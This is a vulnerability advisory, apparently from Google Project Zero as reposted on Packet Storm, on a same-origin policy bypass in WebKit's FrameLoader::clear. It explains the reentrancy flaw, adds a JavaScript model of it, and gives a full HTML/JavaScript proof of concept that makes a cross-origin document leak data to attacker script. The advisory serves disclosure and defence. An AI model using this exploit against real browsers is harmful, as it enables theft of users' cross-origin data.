
WebKit FrameLoader::clear Same-Origin Policy Bypass

Posted Oct 8, 2019
Authored by Google Security Research, Glazvunov

WebKit suffers from a same-origin policy bypass vulnerability in FrameLoader::clear.

tags | exploit, bypass
SHA-256 | 334e5b8a59befbfda5f832467d0a3088d6e29ced2e3ce411870872bfc402e694

WebKit: Same-Origin Policy bypass in FrameLoader::clear

VULNERABILITY DETAILS
```
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    m_frame.editor().clear();

    if (!m_needsClear)
        return; // ***1***
    m_needsClear = false;

    if (m_frame.document()->pageCacheState() != Document::InPageCache) {
        m_frame.document()->cancelParsing(); // ***2***
        [...]
    if (clearWindowProperties)
        m_frame.windowProxy().setDOMWindow(newDocument->domWindow()); // ***3***
```

This bug is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1162. In certain
circumstances, `Document::cancelParsing` [2], which is not guarded by `FrameNavigationDisabler`,
can fire the `readystatechange` event handler. If that handler performs a synchronous document
load, the reentrant `clear` call for the new document exits early [1] and never updates the
page's active global object [3], so the new document executes its JavaScript against the old
(potentially cross-origin) global object. An attacker can exploit this to partially leak the
contents of the new document.
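The reentrancy described above, reduced to a runnable model. This is an added illustration, not WebKit code and not the reproduction case below; `Frame`, `Document`, `FrameLoader`, `navigate`, `props` and the origins used are the model's own names. It keeps the three numbered steps of `clear`: a `needsClear` flag consumed before the call that can run script, a `cancelParsing` that fires `readystatechange` synchronously, and the global-object switch that only happens on the non-reentrant path. The `guardCancelParsing` option models what a `FrameNavigationDisabler`-style guard around that call would do in this model; that is an assumption for illustration, not a claim about WebKit's actual fix.

```javascript
'use strict';

// Model only (not WebKit code): a frame holds the installed document and the
// global object ("DOMWindow") that scripts in the frame execute against.
class Document {
  constructor(origin, inlineScript = null) {
    this.origin = origin;
    this.domWindow = { origin, props: {} };  // this document's own global object
    this.inlineScript = inlineScript;         // runs once the document is installed
    this.onreadystatechange = null;
  }
  // Document::cancelParsing analogue: fires readystatechange synchronously,
  // so page script runs while the loader is in the middle of clear().
  cancelParsing() {
    if (this.onreadystatechange) this.onreadystatechange();
  }
}

class FrameLoader {
  constructor(frame, guardCancelParsing) {
    this.frame = frame;
    this.needsClear = false;
    this.navigationDisablers = 0;              // FrameNavigationDisabler analogue (assumed)
    this.guardCancelParsing = guardCancelParsing;
  }

  clear(newDocument) {
    if (!this.needsClear) return;              // ***1*** a reentrant call exits here
    this.needsClear = false;
    if (this.guardCancelParsing) this.navigationDisablers++;
    this.frame.document.cancelParsing();       // ***2*** may run arbitrary script
    if (this.guardCancelParsing) this.navigationDisablers--;
    this.frame.activeWindow = newDocument.domWindow;  // ***3*** skipped on the reentrant path
  }

  // Synchronous navigation: clear the old document, install the new one and
  // run its inline script against whatever global object the frame has now.
  navigate(newDocument) {
    if (this.navigationDisablers > 0) return false;         // refused while guarded
    if (this.frame.document) this.clear(newDocument);
    else this.frame.activeWindow = newDocument.domWindow;   // first document, nothing to clear
    this.frame.document = newDocument;
    this.needsClear = true;
    if (newDocument.inlineScript) newDocument.inlineScript(this.frame.activeWindow);
    return true;
  }
}

class Frame {
  constructor(guardCancelParsing) {
    this.document = null;
    this.activeWindow = null;
    this.loader = new FrameLoader(this, guardCancelParsing);
  }
}

// Replays the advisory's scenario with constructed origins. Returns the value
// the victim's script leaked (or null) and the origin of the global object the
// victim's script actually ran against (or null if it never ran).
function runScenario({ guardCancelParsing }) {
  const frame = new Frame(guardCancelParsing);
  const result = { leaked: null, scriptGlobalOrigin: null };

  // Attacker-controlled document is installed first (the PoC's iframe).
  const attackerDoc = new Document('https://attacker.example');
  frame.loader.navigate(attackerDoc);

  // Cross-origin victim document whose inline script calls func("secret value").
  const victimDoc = new Document('https://victim.example', (global) => {
    result.scriptGlobalOrigin = global.origin;
    if (typeof global.props.func === 'function') global.props.func('secret value');
  });

  // The attacker's readystatechange handler: put func on the current global,
  // then navigate the frame to the victim from inside clear() -> cancelParsing().
  attackerDoc.onreadystatechange = () => {
    frame.activeWindow.props.func = (value) => { result.leaked = value; };
    frame.loader.navigate(victimDoc);
  };

  // The load that starts the outer clear() (the PoC's javascript: navigation).
  frame.loader.navigate(new Document('https://attacker.example'));
  return result;
}
```

`runScenario({ guardCancelParsing: false })` returns the leaked value because the nested `navigate` hit the early return at [1], installed the victim document, and ran its script while `activeWindow` still pointed at the attacker's global; with `guardCancelParsing: true` the nested navigation is refused and the victim's script never runs against a stale global.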


VERSION
WebKit revision 246877
Safari version 12.1.1 (14607.2.6.1.1)


REPRODUCTION CASE
```
<body>
<script>
function createURL(data, type = 'text/html') {
  return URL.createObjectURL(new Blob([data], {type: type}));
}

// Spins the event loop inside a modal dialog until the victim document has
// been committed into the frame (contentDocument access starts throwing
// cross-origin), then closes the dialog.
function waitForLoad() {
  showModalDialog(createURL(`
    <script>
      let it = setInterval(() => {
        try {
          opener.victim_frame.contentDocument.x;
        } catch (e) {
          clearInterval(it);
          window.close();
        }
      }, 0);
    </scrip` + 't>'));
}

window.onclick = () => {
  victim_frame = document.body.appendChild(document.createElement('iframe'));

  victim_frame.contentDocument.open();
  victim_frame.contentDocument.onreadystatechange = () => {
    victim_frame.contentDocument.onreadystatechange = null;

    victim_frame.contentDocument.open();
    audio = victim_frame.contentDocument.appendChild(document.createElement('audio'));
    counter = 0;
    victim_frame.contentDocument.onreadystatechange = () => {
      if (++counter != 2) {
        return;
      }

      // func is defined on the attacker's global object; the victim document
      // keeps using that global after the reentrant clear() exits early [1].
      victim_frame.contentWindow.func = function(value) {
        alert('leaked: ' + value);
      }

      // Document load started from inside the readystatechange handler fired
      // by cancelParsing [2].
      let a = victim_frame.contentDocument.createElement('a');
      a.href = victim_url;
      a.click();

      waitForLoad();
    };
    audio.src = location + '?' + 'A'.repeat(10000) + Math.random();
    victim_frame.contentDocument.close();
    document.implementation.createHTMLDocument().adoptNode(audio);
  };

  victim_frame.src = 'javascript:""';
}

// Cross-origin victim document whose inline script calls the attacker's func.
victim_url = 'data:text/html,<body><script>func("secret value")<\/script></body>';

ext = document.body.appendChild(document.createElement('iframe'));
ext.src = victim_url;
</script>
</body>
```


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made
broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: glazunov@google.com

© 2022 Packet Storm. All rights reserved.